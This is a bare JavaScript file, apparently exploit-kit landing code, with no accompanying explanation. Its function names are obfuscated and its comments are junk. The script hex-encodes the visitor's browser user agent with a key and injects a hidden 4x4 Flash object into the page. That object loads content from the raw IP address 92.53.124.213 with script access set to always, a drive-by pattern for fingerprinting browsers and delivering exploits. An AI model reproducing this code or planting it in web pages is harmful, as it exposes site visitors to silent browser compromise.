/*s54146d74535hssfj46404fs*/function hgfgerdfgdf(num, width){/*s94240d23082hfj71844fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s76165d94417hfj13977fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s25405d36112hfj40471fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s29629d47491hfj76437fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd25365hfs*/c += b + d;/*s87865d67807hfj46180fs*/e += 1;}return c;}/*s36077dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://92.53.124.213/?ODY4ODkxOTY=&rand=xH_QMrDYbR7FFYDfKPnEUKREMU3WA0eKwYyZha_VF5yxFDTGpbH1Fx_spV-dCF-EmvFvdLMHIwKh1UfASwd&info=NDIwNDI5NTU=&elsa=nz4wOA1sX86j6jkDVzhfN1paA-hSPNAsW_5DEErM6iV_0x7AdIcknwheBv2BQxestVFgZ6Qsalaz7VaOO-w&travel=MzYyMTkyMzc=", ghnvbn("http://92.53.124.213/?NzkzNDMyNDQ=&info=MjMzMzU2NTY=&elsa=nz48OA1sX86v6jkDVzhTN1pWA-hePNAgW_5PEErM6iV_0x7AdIcknwhSBv2NQxestWlsS5ggTmq_7S6OJrg&rand=xH_QMrPYbR3FFYDfKPnEUKdEMU3WA0SKwYyZhazVF5-xFDfGpbL1FxzspVydCF-EmvFvdLAHIwKh1UfASwR&befe=NDEyMzQzMDY=","gexywoaxor"));